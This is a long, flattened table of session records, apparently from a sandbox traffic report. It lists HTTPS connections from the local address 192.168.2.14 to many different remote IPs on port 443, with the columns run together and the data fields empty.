                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18638192.168.2.144066479.196.245.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18639192.168.2.1450954208.174.205.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18640192.168.2.1457560193.185.206.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18641192.168.2.1459380185.118.92.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18642192.168.2.1439540212.114.250.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18643192.168.2.144078623.112.100.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18644192.168.2.144638053.45.199.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18645192.168.2.1456272129.56.18.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18646192.168.2.144317449.58.107.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18647192.168.2.1442504121.97.71.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18648192.168.2.1435962147.186.112.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18649192.168.2.1459412111.102.22.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18650192.168.2.143887096.197.228.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18651192.168.2.1439048201.74.101.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18652192.168.2.1434084177.173.34.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18653192.168.2.1449574141.191.93.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18654192.168.2.1445730195.204.168.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18655192.168.2.146000436.35.64.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18656192.168.2.1453416204.50.157.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18657192.168.2.145238878.154.38.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18658192.168.2.1454462107.219.49.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18659192.168.2.1438156117.111.226.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18660192.168.2.1444856121.182.80.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18661192.168.2.1440546163.138.146.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18662192.168.2.1434042167.75.62.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18663192.168.2.1457602147.198.123.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18664192.168.2.145343088.122.187.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18665192.168.2.1457876137.10.184.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18666192.168.2.143916080.253.240.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18667192.168.2.1443004114.66.1.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18668192.168.2.14421049.199.53.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18669192.168.2.145357663.126.161.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18670192.168.2.144515298.238.83.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18671192.168.2.1437232168.36.82.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18672192.168.2.144610027.45.13.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18673192.168.2.1435080149.164.54.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18674192.168.2.144288418.115.253.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18675192.168.2.144887648.14.160.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18676192.168.2.144813034.166.126.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18677192.168.2.144229037.92.183.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18678192.168.2.1434572207.237.32.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18679192.168.2.145408888.230.22.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18680192.168.2.143682049.69.139.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18681192.168.2.1450088145.48.236.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18682192.168.2.1439868174.251.11.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18683192.168.2.145380496.11.204.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18684192.168.2.145828853.76.88.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18685192.168.2.1436006198.85.114.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18686192.168.2.1436022144.151.140.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18687192.168.2.145184865.105.216.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18688192.168.2.144008258.112.140.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18689192.168.2.145888269.23.255.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18690192.168.2.143628269.242.30.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18691192.168.2.145405682.23.118.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18692192.168.2.1442150130.158.232.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18693192.168.2.1452720155.78.110.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18694192.168.2.1436198182.73.12.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18695192.168.2.1448970199.248.195.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18696192.168.2.1444942140.116.209.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18697192.168.2.1456668132.64.169.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18698192.168.2.1442238213.183.56.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18699192.168.2.145974441.142.100.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18700192.168.2.143828077.172.141.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18701192.168.2.144983854.192.254.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18702192.168.2.1458230125.110.111.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18703192.168.2.1450734130.93.233.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18704192.168.2.1439432101.37.23.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18705192.168.2.1459252126.61.31.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18706192.168.2.144242691.211.37.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18707192.168.2.1454488222.121.184.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18708192.168.2.144067269.66.55.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18709192.168.2.143730273.222.196.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18710192.168.2.1433720140.171.132.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18711192.168.2.145998670.29.73.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18712192.168.2.1454464122.249.149.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18713192.168.2.143373827.73.203.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18714192.168.2.1451952203.80.156.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18715192.168.2.1449074204.247.138.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18716192.168.2.1434012101.163.181.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18717192.168.2.1451814111.232.197.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18718192.168.2.1449870123.163.200.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18719192.168.2.1459646114.158.210.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18720192.168.2.1446942134.108.109.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18721192.168.2.1441216203.138.163.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18722192.168.2.1455640168.47.0.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18723192.168.2.145759834.226.84.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18724192.168.2.1450866149.61.144.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18725192.168.2.1445094132.213.127.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18726192.168.2.144081666.28.208.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18727192.168.2.145705698.234.99.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18728192.168.2.14389962.0.153.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18729192.168.2.144357619.95.249.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18730192.168.2.1438994196.187.160.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18731192.168.2.1460220218.184.251.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18732192.168.2.1439732147.88.14.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18733192.168.2.1443258128.235.33.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18734192.168.2.145144214.248.235.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18735192.168.2.1434662165.10.64.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18736192.168.2.144617065.253.227.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18737192.168.2.1446722212.32.201.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18738192.168.2.144681691.146.187.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18739192.168.2.1459936200.164.16.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18740192.168.2.1452656204.48.124.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18741192.168.2.145970820.159.230.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18742192.168.2.145532090.172.86.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18743192.168.2.1446310144.124.123.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18744192.168.2.1438576125.34.112.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18745192.168.2.1452014165.236.211.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18746192.168.2.1456746136.23.94.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18747192.168.2.1440756150.8.31.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18748192.168.2.1459002211.31.119.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18749192.168.2.144303443.192.175.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18750192.168.2.1444122121.185.93.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18751192.168.2.1445228210.0.2.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18752192.168.2.1437728185.245.210.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18753192.168.2.1444168153.143.24.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18754192.168.2.1436264197.232.167.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18755192.168.2.1460380179.20.120.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18756192.168.2.144311074.126.170.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18757192.168.2.1441376130.48.184.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18758192.168.2.1452226157.203.81.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18759192.168.2.1444590113.124.240.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18760192.168.2.145625657.43.177.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18761192.168.2.145535858.14.184.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18762192.168.2.1460176218.92.35.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18763192.168.2.1446108138.29.69.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18764192.168.2.1454964189.255.9.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18765192.168.2.14551042.150.176.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18766192.168.2.1455498163.23.162.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18767192.168.2.1455540221.78.192.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18768192.168.2.143582052.17.252.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18769192.168.2.1459568169.88.118.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18770192.168.2.144081244.116.47.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18771192.168.2.1452000187.133.128.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18772192.168.2.143695898.109.222.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18773192.168.2.144929685.44.68.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18774192.168.2.1454654208.182.76.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18775192.168.2.1441234218.97.57.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18776192.168.2.143557286.228.146.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18777192.168.2.143808862.253.4.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18778192.168.2.144596412.218.65.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18779192.168.2.14473922.4.189.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18780192.168.2.1436840150.229.220.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18781192.168.2.143461652.12.122.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18782192.168.2.145912079.88.133.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18783192.168.2.1448170121.232.168.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18784192.168.2.145237675.3.8.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18785192.168.2.144290249.91.103.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18786192.168.2.1434220216.0.97.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18787192.168.2.1456968110.215.50.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18788192.168.2.144336659.207.101.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18789192.168.2.143899491.80.57.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18790192.168.2.1459696123.56.7.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18791192.168.2.1442702150.242.157.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18792192.168.2.1438074190.30.163.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18793192.168.2.1456816218.49.216.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18794192.168.2.1439526135.177.128.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18795192.168.2.1455952120.216.225.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18796192.168.2.1432932165.83.80.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18797192.168.2.1450026155.174.26.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18798192.168.2.1437380141.4.71.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18799192.168.2.1454050105.209.142.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18800192.168.2.145123841.24.209.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18801192.168.2.1436754120.186.107.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18802192.168.2.1444604158.146.189.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18803192.168.2.1455062137.208.166.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18804192.168.2.143784065.207.150.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18805192.168.2.1459552174.59.3.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18806192.168.2.145313289.19.248.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18807192.168.2.1449700185.8.69.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18808192.168.2.145522672.196.208.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18809192.168.2.1460606209.92.15.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18810192.168.2.1434456211.67.253.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18811192.168.2.1453508141.236.106.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18812192.168.2.145526448.36.23.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18813192.168.2.1440224147.4.159.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18814192.168.2.1451774122.227.161.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18815192.168.2.1439546210.219.234.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18816192.168.2.145625013.48.199.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18817192.168.2.1436984115.110.241.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18818192.168.2.145028419.230.35.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18819192.168.2.1450548220.52.159.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18820192.168.2.1433696110.224.217.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18821192.168.2.143951035.113.208.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18822192.168.2.1441860192.2.165.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18823192.168.2.145601432.102.73.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18824192.168.2.145307474.148.191.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18825192.168.2.1435500141.46.218.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18826192.168.2.144019897.197.163.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18827192.168.2.146087617.181.66.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18828192.168.2.1446878120.204.205.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18829192.168.2.1446690195.88.58.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18830192.168.2.1432872192.102.20.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18831192.168.2.1433644211.209.47.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18832192.168.2.145610082.143.29.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18833192.168.2.1457624136.4.93.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18834192.168.2.1452410223.70.48.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18835192.168.2.1454618138.225.0.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18836192.168.2.144291852.232.208.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18837192.168.2.145962852.221.90.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18838192.168.2.143921085.72.245.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18839192.168.2.146097220.40.178.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18840192.168.2.145047847.153.234.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18841192.168.2.1439874125.240.111.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18842192.168.2.1454326218.250.196.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18843192.168.2.145495217.230.19.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18844192.168.2.144409836.108.180.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18845192.168.2.1434872194.98.83.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18846192.168.2.1450286155.243.243.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18847192.168.2.1446578180.174.50.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18848192.168.2.143391071.241.27.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18849192.168.2.1456140187.63.198.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18850192.168.2.1450550154.134.248.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18851192.168.2.144180054.72.10.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18852192.168.2.1446336126.115.118.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18853192.168.2.143504289.159.94.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18854192.168.2.143442849.242.34.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18855192.168.2.14498182.190.29.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18856192.168.2.1440950174.55.121.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18857192.168.2.1444988111.72.9.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18858192.168.2.145575651.145.134.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
